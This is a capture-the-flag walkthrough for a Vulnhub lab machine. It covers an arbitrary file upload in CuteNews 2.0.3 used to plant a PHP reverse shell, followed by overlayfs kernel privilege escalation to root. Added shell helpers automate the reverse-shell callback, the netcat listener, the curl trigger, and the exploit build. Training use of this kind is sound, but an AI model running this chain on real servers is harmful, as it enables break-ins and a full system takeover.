In this article, we discuss a boot2root Capture The Flag (CTF) challenge. The machine is available on Vulnhub: download the .OVA file from there and start the virtual machine in VMware or VirtualBox. The author of this machine is Robert Winkel. The difficulty level of this challenge is easy, so it is also recommended for beginners who are getting started with penetration testing.
Level: easy
First, find the IP address of the vulnerable machine, then scan it.
Make sure your Kali Linux VM and the vulnerable machine are on the same network. Once the target has booted, open a terminal in Kali and find your own IP address and subnet with ifconfig (or ip addr). Then run an Nmap ping sweep of that subnet to list the other hosts connected to it.
This sweep lists the other devices on the network. Identify the IP address of the vulnerable machine (the one that is neither your Kali box nor the gateway) and run an Nmap port scan against it to find the services listening on its ports.
We find that only one TCP port is open, port 80. This is the default port on which an HTTP server listens for web page requests. To see what it serves, we open a web browser and enter the IP address.
We find that a login page is hosted at that address. There is not much information on the page beyond the username and password fields for logging in and a link to register as a new user.
To collect more information, we run an aggressive scan with nmap -A. This adds OS detection, version detection, the default NSE scripts and a traceroute to the port scan.
From this we notice that the login page belongs to a web application called CuteNews, and the CuteNews version, 2.0.3, is printed on the page.
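The recon steps above can be scripted so the open ports feed the next step instead of being read off the screen. The helpers below are an added example and are not part of the original walkthrough: discover_hosts sweeps the subnet, scan_host and aggressive_scan wrap the two Nmap runs, and open_ports parses Nmap's grepable (-oG) output. The subnet, the host addresses and the sample scan file are constructed placeholders, not values from the page.

```sh
#!/bin/sh
# Added example (not from the original walkthrough): recon helpers for the
# host-discovery and port-scan steps. The subnet, the addresses and the
# sample scan file below are constructed placeholders.

# Ping sweep of a subnet; prints one live IP per line.
# Usage: discover_hosts 192.168.56.0/24
discover_hosts() {
    nmap -sn -oG - "$1" | awk '/Status: Up/ { print $2 }'
}

# Full-range service/version scan of one host, saved in grepable format.
# Usage: scan_host 192.168.56.101 scan.gnmap
scan_host() {
    nmap -sV -p- -oG "$2" "$1" >/dev/null
}

# Aggressive scan (OS detection, version detection, default scripts,
# traceroute) once the interesting host is known.
# Usage: aggressive_scan 192.168.56.101 scan.nmap
aggressive_scan() {
    nmap -A -oN "$2" "$1"
}

# Parse a -oG file and print "host port/proto service" for each open port.
# A "Ports:" entry looks like 80/open/tcp//http//Apache httpd 2.4.7 ((Ubuntu))/
# with the fields port/state/proto/owner/service/rpc/version; entries for
# one host are comma-separated and closed/filtered ports are skipped.
open_ports() {
    grep '^Host:.*Ports:' "$1" | while IFS= read -r line; do
        host=$(printf '%s\n' "$line" | awk '{ print $2 }')
        printf '%s\n' "$line" \
            | sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' \
            | tr ',' '\n' | sed 's/^ *//' \
            | awk -F/ -v h="$host" '$2 == "open" { print h " " $1 "/" $3 " " $5 }'
    done
}

# Constructed sample of what scan_host writes for the target (only TCP/80
# open) plus a hypothetical second host, so the parser can be tried offline.
write_sample_gnmap() {
    printf '%s\n' '# Nmap 6.47 scan initiated as: nmap -sV -p- -oG scan.gnmap 192.168.56.0/24' > "$1"
    printf 'Host: 192.168.56.101 ()\tStatus: Up\n' >> "$1"
    printf 'Host: 192.168.56.101 ()\tPorts: 80/open/tcp//http//Apache httpd 2.4.7 ((Ubuntu))/\tIgnored State: closed (65534)\n' >> "$1"
    printf 'Host: 192.168.56.102 ()\tStatus: Up\n' >> "$1"
    printf 'Host: 192.168.56.102 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.6.1p1/, 80/open/tcp//http//nginx/, 443/filtered/tcp//https///\tIgnored State: closed (65532)\n' >> "$1"
    printf '%s\n' '# Nmap done' >> "$1"
}

# Usage from Kali:
#   discover_hosts 192.168.56.0/24
#   scan_host 192.168.56.101 scan.gnmap && open_ports scan.gnmap
```

On the sample file, open_ports prints one line for the target's port 80 and two for the hypothetical second host, dropping its filtered port 443.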
So we use the searchsploit command to look for an exploit for CuteNews 2.0.3. We find an entry in Exploit-DB named "Arbitrary File Upload".
Click here to see the exploit for CuteNews 2.0.3.
The exploit's instructions say to register a new user and log in; after that we should be able to upload a PHP file through the avatar upload, because the application does not check that the uploaded file is really an image. So the plan is to upload a PHP reverse shell and have the server execute it. We follow the given steps, register, and reach the dashboard.
Click here to download the php-reverse-shell.php exploit.
On the dashboard, clicking Personal options takes us to https://www.target.com/cutenews/index.php?mod=main&opt=personal, where there is a Browse button for uploading an avatar image.
Preparing the PHP Reverse Shell file for upload and starting the listener.
In php-reverse-shell.php we change the IP address to the Kali machine's IP and the listening port to 1234, so that when the script runs on the server it connects back to the Kali machine on port 1234. In another terminal we start a listener for that connection with Netcat: nc -nlvp 1234.
Now we click Browse, select the PHP file and click "Save changes". We right-click the (broken) avatar image and choose Inspect, which shows the img tag and, in its src attribute, the path under which the server stored our file. Opening that src link in the browser makes the server execute the PHP, and the listener receives the reverse shell.
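The upload step above can be done from the terminal as well. The helpers below are an added example, not code from the original walkthrough or from CuteNews: set_callback rewrites the $ip and $port lines at the top of the pentestmonkey php-reverse-shell.php, callback_of reads them back so the edit can be checked before uploading, avatar_src pulls the stored file's path out of a saved copy of the profile page instead of the browser inspector, and trigger_shell requests it so the server runs the script. The Kali address, the port, the uploads path in the sample HTML and the sample template lines are constructed assumptions, not values from the page.

```sh
#!/bin/sh
# Added example (not from the original walkthrough): preparing the reverse
# shell template and locating the uploaded file. Addresses, ports, the
# uploads path and the sample files below are constructed assumptions.

# Set the IP and port that the uploaded script connects back to. Only the
# value is replaced, so the template's trailing comments survive.
# Usage: set_callback php-reverse-shell.php 192.168.56.102 1234
set_callback() {
    case $3 in ''|*[!0-9]*) echo "port must be numeric" >&2; return 1;; esac
    sed -e "s/^[\$]ip = '[^']*';/\$ip = '$2';/" \
        -e "s/^[\$]port = [0-9]*;/\$port = $3;/" "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# Print "ip port" as currently set in the template (sanity check before upload).
callback_of() {
    ip=$(sed -n "s/^[\$]ip = '\([^']*\)';.*/\1/p" "$1")
    port=$(sed -n "s/^[\$]port = \([0-9]*\);.*/\1/p" "$1")
    printf '%s %s\n' "$ip" "$port"
}

# Listener that receives the shell; run this in a second terminal first.
# Usage: start_listener 1234
start_listener() {
    nc -nlvp "$1"
}

# Extract the src of the first <img> in a saved copy of the personal
# options page: that is the path the application stored the upload under.
# Usage: avatar_src personal.html
avatar_src() {
    grep -o '<img[^>]*src="[^"]*"' "$1" | sed 's/.*src="\([^"]*\)"/\1/' | head -n 1
}

# Request the uploaded script in the background so the PHP executes and the
# listener gets the connection; the request itself never returns a page.
# Usage: trigger_shell http://192.168.56.101/cutenews/uploads/avatar_test_php-reverse-shell.php
trigger_shell() {
    curl -s -m 5 "$1" >/dev/null 2>&1 &
}

# Constructed stand-in for the first lines of php-reverse-shell.php.
write_sample_template() {
    cat > "$1" <<'EOF'
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
EOF
}

# Constructed stand-in for the avatar markup on the profile page; the
# uploads path is an assumption about where the avatar ends up.
write_sample_profile() {
    cat > "$1" <<'EOF'
<div class="avatar"><img src="../uploads/avatar_test_php-reverse-shell.php" alt="avatar"></div>
EOF
}
```

Run set_callback, confirm the values with callback_of, start the listener, upload the file through the browser, save the profile page, and feed the path avatar_src prints to trigger_shell.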
Privilege Escalation to get into the root folder and access the flag.txt file
We confirm that we are not root with id or whoami: the shell runs as www-data, the web server's user. uname -a shows the Linux kernel version, 3.16.0-30-generic. Our goal is to escalate to root by exploiting the kernel and then read the flag from the root directory.
We cd to /tmp, a world-writable directory, to run the exploits from. With wget we download the script Linux-Exploit-Suggester.sh and make it executable with chmod. As its name suggests, running it lists the known kernel exploits the system might be vulnerable to, with a download link and a rough likelihood for each.
Click here to download the Linux-Exploit-Suggester.sh
We choose the 'overlayfs' Local Privilege Escalation. We download the exploit from Exploit-DB directly onto the target with wget and make it executable with chmod. Its header notes that it must be compiled with gcc, so we run gcc --version to check whether a C compiler is installed on the system.
Click here to download the overlayfs exploit from Exploit-DB.
We compile the C source with gcc into an output file named exploit and run it with ./exploit. The prompt changes from "$" to "#", the conventional sign of a root shell, and id confirms that our uid is now root. Hence we have escalated our privileges to root.
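Before downloading and building a kernel exploit it is worth checking, from the www-data shell, that the kernel is actually in the exploit's range, that /tmp is not mounted noexec, and that gcc exists. The functions below are an added example, not code from the original walkthrough or from the exploit itself. The overlayfs exploit used on this page (CVE-2015-1328, Exploit-DB 37292) targets Ubuntu kernels 3.13 through 3.19, so kernel_in_range tests the uname -r string against that window; the range check is only a hint, since a distribution may have backported the fix. The mount lines and kernel strings used as samples are constructed, and the file names are assumptions.

```sh
#!/bin/sh
# Added example (not from the original walkthrough): pre-flight checks for
# the overlayfs local privilege escalation, plus the build step. Sample
# strings are constructed; file names are assumptions.

# Is this kernel release in the 3.13 - 3.19 window the exploit targets?
# Usage: kernel_in_range "$(uname -r)"
kernel_in_range() {
    maj=${1%%.*}
    rest=${1#*.}
    min=${rest%%.*}
    case $maj in ''|*[!0-9]*) return 1;; esac
    case $min in ''|*[!0-9]*) return 1;; esac
    if [ "$maj" -eq 3 ] && [ "$min" -ge 13 ] && [ "$min" -le 19 ]; then
        return 0
    fi
    return 1
}

# Does a /proc/mounts line allow executing files (no "noexec" option)?
# An empty line means the directory is not its own mount and inherits the
# parent filesystem's options, which we treat as executable.
# Usage: mount_allows_exec "$(awk '$2 == "/tmp"' /proc/mounts)"
mount_allows_exec() {
    opts=$(printf '%s\n' "$1" | awk '{ print $4 }')
    case ",$opts," in *,noexec,*) return 1;; esac
    return 0
}

# Is a C compiler available on the target?
have_gcc() {
    command -v gcc >/dev/null 2>&1
}

# Compile the downloaded exploit source into a binary.
# Usage: build_exploit ofs.c /tmp/exploit
build_exploit() {
    if ! have_gcc; then
        echo "no gcc on target: compile on a matching system and upload the binary" >&2
        return 1
    fi
    gcc "$1" -o "$2" && chmod +x "$2"
}

# Run every check and report; exit status is 0 only if all pass.
# Usage: privesc_precheck
privesc_precheck() {
    ok=0
    rel=$(uname -r)
    if kernel_in_range "$rel"; then
        echo "[+] kernel $rel is in the 3.13-3.19 window"
    else
        echo "[-] kernel $rel is outside the window, pick another exploit"; ok=1
    fi
    if mount_allows_exec "$(awk '$2 == "/tmp"' /proc/mounts 2>/dev/null)"; then
        echo "[+] /tmp allows exec"
    else
        echo "[-] /tmp is mounted noexec, build somewhere else (e.g. /dev/shm)"; ok=1
    fi
    if have_gcc; then
        echo "[+] gcc: $(gcc --version | head -n 1)"
    else
        echo "[-] no gcc on target"; ok=1
    fi
    return $ok
}

# Typical run from the www-data shell:
#   privesc_precheck && build_exploit ofs.c /tmp/exploit && /tmp/exploit && id
```

If privesc_precheck fails on the kernel check, the suggester's other candidates are the better use of time; if it fails only on gcc, compile on a matching Ubuntu system and upload the binary instead.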
Now we change directory to /root. ls shows flag.txt, our target, and cat flag.txt prints its contents. With that we have completed this CTF challenge successfully.
Please refer to the video tutorial in case of any doubts.
Please comment below for suggestions and questions.